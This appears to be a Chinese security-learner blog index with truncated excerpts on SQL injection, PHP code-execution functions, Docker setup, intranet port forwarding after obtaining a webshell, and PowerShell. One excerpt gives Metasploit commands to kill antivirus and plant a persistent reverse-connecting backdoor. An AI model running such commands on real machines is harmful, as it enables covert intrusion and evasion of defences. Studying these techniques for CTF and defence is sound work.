weixin_44255856的博客

前言，因为学长叫我用ppt总结下自己这几个月学了什么内容，早就想大总结一次了，刚好有了这次机会。自己从2019二月份接触了三叶草小组的朋友，无意接触了ctf，感觉很有趣，于是就入了信安这个坑。以下全是自己个人的总结，若有地方不对，还请大佬指正。学习总结学习了web基础的一些漏洞1,sql注入原理： sql命令插入到web数据表单，然后提交被数据库误认为是正常的SQL指令而运行，从而执...

docker安装1.更换国内软件源，推荐中国科技大学的源，稳定速度快sudo cp /etc/apt/sources.list /etc/apt/sources.list.baksudo sed -i 's/archive.ubuntu.com/mirrors.ustc.edu.cn/g' /etc/apt/sources.listsudo apt update2.安装需要的包sud...

一 代码执行函数PHP中可以执行代码的函数。如eval()、assert()、``、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等<?phpecho `dir`;?>二 文件包含代码注射文件包含函数在特定条件下的代码注射，如include()、include_once()、 ...

内网端口转发应用场景：当你拿到一个网站的shell，然后提权，以及各种的一些操作，当你想开启目标服务器的远程桌面时，然而他却处于内网的服务器中，有什么办法实现呢？这里就要运用到端口转发了。端口转发技术,用于允许外部备使用私人电脑服务网络。对于防火墙禁止访问某些端口的问题，比如3389端口，我们可以将利用机器的3000端口做端口转发，从外界接受数据，转发给本机的3389端口，从而绕过防火...

Persistence后门使用此方法建议运行前关闭杀毒软件Run post/windows/manage/killav输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。详细信息如下：-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理-L如果不使用%TEMP%，则选择目标主机中写入有效负载的...

简介：PowerShell是一种基于任务的命令行shell和脚本语言建立在net。 PowerShell帮助系统管理员和高级用户快速自动化管理的任务 操作系统(Linux、macOS和Windows)和过程。PowerShell命令允许您从命令行管理电脑。 PowerShell供应商让你 访问数据存储,如注册表和证书存储,尽可能轻松地访问文件 系统。其可读性，易用性，基于当前所有shell之首。...

首先我们先谈谈php各个版本的的差异php5.2以前__autoload()加载类文件，但只能调用一次这个函数，所以可以用spl_autoload_register()加载类关于 __autoload()函数，如果定义了该函数，该代码就会被调用关于spl_autoload_register()函数：注册给定的函数作为 __autoload 的实现当出现未定义的类时，标准PHP库会...